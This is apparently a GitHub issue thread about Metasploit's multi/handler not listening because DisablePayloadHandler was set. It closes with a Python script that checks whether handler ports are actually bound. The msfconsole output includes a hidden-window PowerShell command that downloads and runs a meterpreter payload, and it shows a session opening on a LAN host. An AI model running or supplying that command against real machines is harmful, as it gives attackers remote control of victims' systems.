rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Multi/Handler with any reverse shell can't listen to lport #9337

Closed fecosco closed 6 years ago

fecosco commented 6 years ago

Sometimes when I use Multi/Handler on Kali (Debian and Ubuntu show the same issue sometimes) it can't listen for connections, while web_delivery works well, so there are no LAN issues. Follow these steps:

       msf exploit(handler) > use multi/handler
       msf exploit(handler) > set payload windows/x64/meterpreter/reverse_https
       payload => windows/x64/meterpreter/reverse_https
       msf exploit(handler) > set lhost 10.2.0.110
       lhost => 10.2.0.110
       msf exploit(handler) > set exitonsession false
       exitonsession => false
       msf exploit(handler) > exploit -j -z
       [*] Exploit running as background job 5.
       msf exploit(handler) > jobs

       Jobs
       ====

         Id  Name                    Payload                                Payload opts
         --  ----                    -------                                ------------
         5   Exploit: multi/handler  windows/x64/meterpreter/reverse_https  https://10.2.0.110:443

When scanning with nmap, port 443 is closed:

      Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 00:03 -02
      NSE: Loaded 146 scripts for scanning.
      NSE: Script Pre-scanning.
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating Parallel DNS resolution of 1 host. at 00:03
      Completed Parallel DNS resolution of 1 host. at 00:03, 0.17s elapsed
      Initiating SYN Stealth Scan at 00:03
      Scanning 10.2.0.110 [1 port]
      Completed SYN Stealth Scan at 00:03, 0.22s elapsed (1 total ports)
      Initiating Service scan at 00:03
      Initiating OS detection (try #1) against 10.2.0.110
      adjust_timeouts2: packet supposedly had rtt of -127015 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -127015 microseconds.  Ignoring time.
      Retrying OS detection (try #2) against 10.2.0.110
      adjust_timeouts2: packet supposedly had rtt of -101067 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101067 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101032 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101032 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101271 microseconds.  Ignoring time.
      adjust_timeouts2: packet supposedly had rtt of -101271 microseconds.  Ignoring time.
      WARNING: OS didn't match until try #2
      NSE: Script scanning 10.2.0.110.
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Nmap scan report for 10.2.0.110
      Host is up (0.000055s latency).

      PORT    STATE  SERVICE VERSION
      443/tcp closed https
      Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
      Device type: general purpose
      Running: Linux 2.6.X
      OS CPE: cpe:/o:linux:linux_kernel:2.6
      OS details: Linux 2.6.14 - 2.6.34, Linux 2.6.17, Linux 2.6.17 (Mandriva)
      Network Distance: 0 hops

      NSE: Script Post-scanning.
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Initiating NSE at 00:03
      Completed NSE at 00:03, 0.00s elapsed
      Read data files from: /usr/bin/../share/nmap
      OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
      Nmap done: 1 IP address (1 host up) scanned in 3.43 seconds
      Raw packets sent: 32 (3.738KB) | Rcvd: 61 (6.212KB)

Now, look at the same environment with a working psh_web_delivery:

       use exploit/multi/script/psh_web_delivery
       set payload windows/meterpreter/reverse_https
       msf exploit(psh_web_delivery) > set srvhost 10.2.0.110
       srvhost => 10.2.0.110
       msf exploit(psh_web_delivery) > set srvport 8080
       srvport => 8080
       msf exploit(psh_web_delivery) > set lport 80
       lport => 80
       msf exploit(psh_web_delivery) > set uripath update
       msf exploit(psh_web_delivery) > exploit -j -z
       [*] Exploit running as background job 6.

       [*] Started HTTPS reverse handler on https://10.2.0.110:80
       msf exploit(psh_web_delivery) > [*] Using URL: http://0.0.0.0:8080/update
       [*] Local IP: http://10.2.0.110:8080/update
       [*] Server started.
       [*] Run the following command on the target machine:
       powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://10.2.0.110:8080/update'))"
       jobs

       Jobs
       ====

         Id  Name                                    Payload                                Payload opts
         --  ----                                    -------                                ------------
         5   Exploit: multi/handler                  windows/x64/meterpreter/reverse_https  https://10.2.0.110:443
         6   Exploit: multi/script/psh_web_delivery  windows/meterpreter/reverse_https      https://10.2.0.110:80

       msf exploit(psh_web_delivery) > 
       [*] 10.2.0.103       psh_web_delivery - Delivering Payload
       [*] https://10.2.0.110:80 handling request from 10.2.0.103; (UUID: 4ryy1v13) Staging x86 payload (180311 bytes) ...
       [*] Meterpreter session 2 opened (10.2.0.110:80 -> 10.2.0.103:49240) at 2017-12-22 00:12:08 -0200

When scanning with nmap, ports 8080 and 80 are open:

       Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 00:18 -02
       NSE: Loaded 146 scripts for scanning.
       NSE: Script Pre-scanning.
       Initiating NSE at 00:18
       Completed NSE at 00:18, 0.00s elapsed
       Initiating NSE at 00:18
       Completed NSE at 00:18, 0.00s elapsed
       Initiating Parallel DNS resolution of 1 host. at 00:18
       Completed Parallel DNS resolution of 1 host. at 00:18, 0.08s elapsed
       Initiating SYN Stealth Scan at 00:18
       Scanning 10.2.0.110 [1000 ports]
       Discovered open port 8080/tcp on 10.2.0.110
       Discovered open port 80/tcp on 10.2.0.110
       Completed SYN Stealth Scan at 00:18, 1.59s elapsed (1000 total ports)
       Initiating Service scan at 00:18
       Scanning 2 services on 10.2.0.110
       Completed Service scan at 00:18, 18.39s elapsed (2 services on 1 host)
       Initiating OS detection (try #1) against 10.2.0.110
       NSE: Script scanning 10.2.0.110.
       Initiating NSE at 00:18
       Completed NSE at 00:19, 47.17s elapsed
       Initiating NSE at 00:19
       Completed NSE at 00:19, 0.00s elapsed
       Nmap scan report for 10.2.0.110
       Host is up (0.0000060s latency).
       Not shown: 998 closed ports
       PORT     STATE SERVICE  VERSION
       80/tcp   open  ssl/http Apache httpd
       |_http-server-header: Apache
       |_http-title: Site doesn't have a title.
       | ssl-cert: Subject: countryName=US/ST=NM/L=Amy/O=Edward/CN=vojr.5hlhhrgt.edu
       | Issuer: countryName=US/O=Roy/CN=Nancy George
       | Public Key type: rsa
       | Public Key bits: 2048
       | Signature Algorithm: sha256WithRSAEncryption
       | Not valid before: 2016-03-08T03:58:09
       | Not valid after:  2019-03-08T03:58:09
       | MD5:   c359 ee7b 3192 4376 26fc 7197 1797 7401
       |_SHA-1: c279 054f 738b e5ef 89e0 45b2 0352 7c1a 18d4 8683
       8080/tcp open  http     Apache httpd
       |_http-server-header: Apache
       |_http-title: 404 Not Found
       Device type: general purpose
       Running: Linux 3.X|4.X
       OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
       OS details: Linux 3.8 - 4.9
       Uptime guess: 49.038 days (since Thu Nov  2 23:24:54 2017)
       Network Distance: 0 hops
       TCP Sequence Prediction: Difficulty=260 (Good luck!)
       IP ID Sequence Generation: All zeros

       NSE: Script Post-scanning.
       Initiating NSE at 00:19
       Completed NSE at 00:19, 0.00s elapsed
       Initiating NSE at 00:19
       Completed NSE at 00:19, 0.00s elapsed
       Read data files from: /usr/bin/../share/nmap
       OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
       Nmap done: 1 IP address (1 host up) scanned in 70.05 seconds
       Raw packets sent: 1114 (51.720KB) | Rcvd: 2232 (97.812KB)

wvu commented 6 years ago

Shows as open for me. Paste your Nmap commands.

fecosco commented 6 years ago

Sorry,

MSF ver is v4.16.13-dev

       nmap -sV -T4 -O -F --version-light 10.2.0.110 -p <port 443, 80, 8080, any port used in msf>

wvu commented 6 years ago

-F is incompatible with -p, btw.

wvu commented 6 years ago

       msf > use exploit/multi/handler
       msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
       payload => windows/x64/meterpreter/reverse_https
       msf exploit(multi/handler) > set lhost [redacted]
       lhost => [redacted]
       msf exploit(multi/handler) > set lport 443
       lport => 443
       msf exploit(multi/handler) > set exitonsession false
       exitonsession => false
       msf exploit(multi/handler) > run -j
       [*] Exploit running as background job 0.
       msf exploit(multi/handler) >
       [*] Started HTTPS reverse handler on https://[redacted]:443
       [*] https://[redacted]:443 handling request from [redacted]; (UUID: hrzqu8av) Unknown request to  with UA ''
       root@hiigara:~# nmap -sV -T4 -O --version-light [redacted] -p 443,80,8080

       Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 06:11 CST
       Nmap scan report for [redacted]
       Host is up (0.00022s latency).

       PORT     STATE  SERVICE    VERSION
       80/tcp   closed http
       443/tcp  open   ssl/http   Apache httpd
       8080/tcp closed http-proxy
       Device type: general purpose
       Running: Linux 3.X|4.X
       OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
       OS details: Linux 3.8 - 4.9
       Network Distance: 0 hops

       OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
       Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
       root@hiigara:~#

Check your networking once again.

fecosco commented 6 years ago

I found the problem: it works without DisablePayloadHandler set to true.

wvu commented 6 years ago

That's because DisablePayloadHandler disables the payload handler.
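The lesson of this thread is that a handler appearing in `jobs` is no proof that anything is bound to its port; a job started with DisablePayloadHandler set to true is listed all the same. As an added example (not from the issue and not Metasploit's own code), this Python script parses the Payload opts column of a `jobs` table, using the rows pasted above as a constructed sample, and checks each advertised listener with a plain TCP connect; `open_temp_listener` is a hypothetical helper whose only job is to give the check a real local socket to hit.

```python
import re
import socket

# Matches the Payload opts column of an msfconsole `jobs` table, e.g. "https://10.2.0.110:443".
_LISTENER_RE = re.compile(r"\b(?P<scheme>[a-z]+)://(?P<host>[^\s:/]+):(?P<port>\d{1,5})\b")

def parse_job_listeners(jobs_text):
    """Return (job_id, scheme, host, port) for every data row of a `jobs` table."""
    listeners = []
    for line in jobs_text.splitlines():
        fields = line.split()
        if not fields or not fields[0].isdigit():  # skip the header and separator rows
            continue
        m = _LISTENER_RE.search(line)
        if m:
            listeners.append((int(fields[0]), m["scheme"], m["host"], int(m["port"])))
    return listeners

def port_is_listening(host, port, timeout=1.0):
    """True if a TCP connect to host:port succeeds, i.e. something is actually bound there."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable or timed out: nothing is accepting connections
        return False

def check_listeners(jobs_text):
    """Map each job id to whether its advertised listener accepts a connection."""
    return {jid: port_is_listening(host, port)
            for jid, _scheme, host, port in parse_job_listeners(jobs_text)}

def open_temp_listener():
    """Hypothetical helper: bind a throwaway listener on 127.0.0.1 to demonstrate a true positive."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s, s.getsockname()[1]

# Constructed sample: the `jobs` table rows pasted in the thread above.
SAMPLE_JOBS = """\
  Id  Name                                    Payload                                Payload opts
  --  ----                                    -------                                ------------
  5   Exploit: multi/handler                  windows/x64/meterpreter/reverse_https  https://10.2.0.110:443
  6   Exploit: multi/script/psh_web_delivery  windows/meterpreter/reverse_https      https://10.2.0.110:80
"""

if __name__ == "__main__":
    for jid, ok in check_listeners(SAMPLE_JOBS).items():
        print(f"job {jid}: {'listening' if ok else 'NOT listening'}")
```

Run it on the same host as msfconsole after `jobs`; a job that reports NOT listening is the situation the issue describes, whatever the jobs table says.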